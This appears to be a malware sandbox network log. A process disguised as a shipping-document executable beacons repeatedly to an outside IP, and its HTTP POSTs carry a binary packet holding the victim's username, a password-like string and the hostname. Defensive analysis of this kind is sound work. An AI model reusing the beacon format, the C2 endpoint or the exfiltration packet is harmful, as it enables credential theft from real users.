32	192.168.2.4	49781	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:38.643234968 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:38.772644997 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:39.630266905 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:38 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:39.630357027 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:39.630510092 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:39.639353037 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:39.639588118 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:39.639868975 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:39.639964104 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:39.640228987 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:39.640244007 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:39.640268087 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49782	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:39.921948910 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:40.056274891 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:40.912035942 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:39 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:40.912065983 CEST	70	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
Apr 25, 2024 09:42:40.912219048 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:40.921699047 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:40.922399998 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:40.922539949 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:40.922666073 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:40.923187971 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:40.923249960 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:40.923321009 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49783	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:41.192421913 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:41.322518110 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:42.184628010 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:41 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:42.184706926 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:42.194593906 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:42.195008039 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:42.195261955 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:42.195393085 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:42.195482969 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:42.195574045 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:42.195687056 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 25, 2024 09:42:42.195718050 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49784	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:42.452934980 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:42.580739021 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:43.494532108 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:42 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:43.494645119 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:43.494771004 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:43.513849974 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:43.514064074 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:43.514203072 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:43.514353991 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:43.514488935 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:43.514532089 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:43.514616966 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49785	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:43.818012953 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:43.943766117 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:44.759720087 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:43 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:44.760068893 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:44.768596888 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:44.769366980 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:44.769484997 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:44.769496918 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
